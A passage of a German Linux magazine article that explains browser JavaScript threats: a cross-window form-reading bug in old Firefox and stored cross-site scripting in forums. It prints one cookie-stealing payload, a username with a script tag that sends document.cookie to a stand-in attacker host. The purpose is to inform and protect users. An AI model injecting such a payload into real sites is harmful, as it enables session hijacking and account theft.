Code aus dem Internet

Per JavaScript lassen sich Formular-Werte auslesen (Abbildung 3) – auch aus Formularen in einem anderen Fenster. Da das Gefährdungspotential offensichtlich ist (es müssen nur die Online-Banking-Seite und die Seite eines Angreifers gleichzeitig offen sein, damit der Angreifer auf alle Ihre Eingaben Zugriff hat), schränkt JavaScript diesen fenster- oder frameübergreifende Zugriff ein: Er funktioniert nur, wenn beide Seiten/Frames von der gleichen Domain stammen.

Doch grau ist alle Theorie: Immerhin bis einschließlich Firefox 1.0 war diese wichtige Einschränkung nicht richtig implementiert. Zumindest aktuelle Konqueror- oder Opera-Versionen weisen diese Verwundbarkeit nicht auf. Folgendes Szenario wäre mit Firefox < 1.0 realisierbar: Ein Angreifer schickt per Mail einen präparierten Link. Dieser öffnet zwar Ihre Bank-Seite, im Hintergrund jedoch zusätzlich ein kleines Popup. Dieses nicht sichtbare Fenster kann dann alle Eingaben "mitschreiben" und dem Angreifer zusenden.

Abbildung 3: JavaScript kann Eingaben aus Formularfeldern auslesen – durch einen Bug teilweise auch über Domaingrenzen hinweg. So kann ein Angreifer die Daten an seine eigene Adresse verschicken.

Bedrohung JavaScript

  • Gehen Sie nie über Links aus zweifelharter Quelle (sprich: Mails; Internet-Seite, deren Seriosität nicht zweifelsfrei feststeht) auf Seiten, die sicherheitskritische Anwendungen bereitstellen. Über präparierte Links kann leicht bösartiger JavaScript-Code eingeschleust werden.
  • Verwenden Sie nur Bookmarks, die Sie selbst erstellt haben.
  • Starten Sie den Browser neu, um sicherzustellen, dass nicht fehlerhafterweise noch JavaScript-Code aus zuvor besuchten Seiten aktiv ist.

Die Hintertür

Webanwendungen wie Foren spielen Angreifern oft in die Hände: Häufig lässt sich über die Hintertüre für die Seitenbesucher gefährlicher JavaScript-Code einschleusen. So könnte ein Angreifer versuchen, sich mit dem Benutzernamen BoeserBube <script>(new Image).src="http://www.angreifer.de/spy.php?sniff=+document.cookie";</script>) anzumelden. Möglich, dass die Webanwendung den JavaScript-Anteil ausfiltert oder den Namen wegen seiner Länge zurückweist. Wenn jedoch nicht, so steht auf jeder Seite, auf der der Benutzername angezeigt wird, ein Skript-Code, der die Cookies der Seitenbesucher ausliest (document.cookie) und diese als Parameter (sniff=[...]) an http://www.angreifer.de übergibt. Sicherheits-Checks des Browsers können hier nichts ausrichten: Der JavaScript-Code steht auf der Seite, zu der die Cookies gehören. Aus Sicht des Browser ist der Zugriff auf die Cookies legitim. Die meisten Webanwendungen nutzen Cookies, um angemeldete Benutzer zu identifizieren (Abbildung 4). Wer Ihr Zugriff auf Ihr Session-Cookie hat, kann "in Ihrem Namen handeln".

Abbildung 4: Webanwendungen nutzen Cookies, um verschiedene Benutzer auseinander zu halten. Gelangen diese Schlüsseldateien durch Cross-Site-Scripting in die Hände eine Angreifers, so kann dieser Ihre Identität annehmen kann.

LinuxCommunity kaufen

Einzelne Ausgabe
 
Abonnements
 
TABLET & SMARTPHONE APPS
Bald erhältlich
Get it on Google Play

Deutschland

Ähnliche Artikel

  • Gut geschützt
    Angreifer wollen Ihren Rechner in ein Bot-Netz integrieren, während Onlinehändler und andere Webseiten Ihr Such- und Kaufverhalten ausspähen möchten. Sicherheit und Privacy sind wichtige Themen – wie gut Sie als Linux-Nutzer geschützt sind, verrät dieser Artikel.
  • Opera 9.5 mit mobilem Gedächtnis
  • Sicherheitsmassnahmen
    Der Webbrowser Firefox bietet bereits viele nützliche Werkzeuge zum Schutz von Privatsphäre und der Sicherheit. Die richtigen Erweiterungen machen den Browser zur wahren Festung gegen Bedrohungen aus dem Internet.
  • Linux kommt in der SANS20-Liste noch gut weg
  • Online-Banking mit Moneypenny
    Die Inkompatbilität der arbeitsfreien Zeit und der Banköffnungszeiten zwingt viele Berufstätige dazu, ihre Bankgeschäfte online abzuwickeln. Doch sowohl Komfort als auch Sicherheit der Web-Interfaces der Banken sind verbesserungsbedürftig.
Kommentare

Infos zur Publikation

LU 03/2017: EFFIZIENTES BÜRO

Digitale Ausgabe: Preis € 5,95
(inkl. 19% MwSt.)

LinuxUser erscheint monatlich und kostet 5,95 Euro (mit DVD 8,50 Euro). Weitere Infos zum Heft finden Sie auf der Homepage.

Das Jahresabo kostet ab 86,70 Euro. Details dazu finden Sie im Computec-Shop. Im Probeabo erhalten Sie zudem drei Ausgaben zum reduzierten Preis.

Bei Google Play finden Sie digitale Ausgaben für Tablet & Smartphone.

HINWEIS ZU PAYPAL: Die Zahlung ist ohne eigenes Paypal-Konto ganz einfach per Kreditkarte oder Lastschrift möglich!

Aktuelle Fragen

Probleme mit der Maus
Thomas Roch, 21.02.2017 13:43, 1 Antworten
Nach 20 Jahren Windows habe ich mich zu Linux Ubuntu probeweise durchgerungen!!! Installation - k...
KWin stürzt ab seit Suse Leap 42.2
Wimpy *, 21.02.2017 09:47, 4 Antworten
OpenSuse 42.2 KDE 5.8.3 Framework 5.26.0 QT 5.6.1 Kernel 4.4.46-11-default 64-bit Open-GL 2....
Shell-Befehl zur Installation von Scanner-Treiber
Achim Zerrer, 15.02.2017 12:13, 10 Antworten
Hallo, ich habe Einen Brother Drucker mit Scanner. Nachdem ich mit Hilfe der Community den Druck...
kiwix öffnet ZIM Datei nicht
Adrian Meyer, 13.02.2017 18:23, 1 Antworten
Hi, ich nutze Zim Desktop für mein privates Wiki. Fürs Handy habe ich mir kiwix heruntergelade...
registration
Brain Stuff, 10.02.2017 16:39, 1 Antworten
Hallo, Das Capatcha auf der Registrierungsseite von linux-community ist derartig schlecht gema...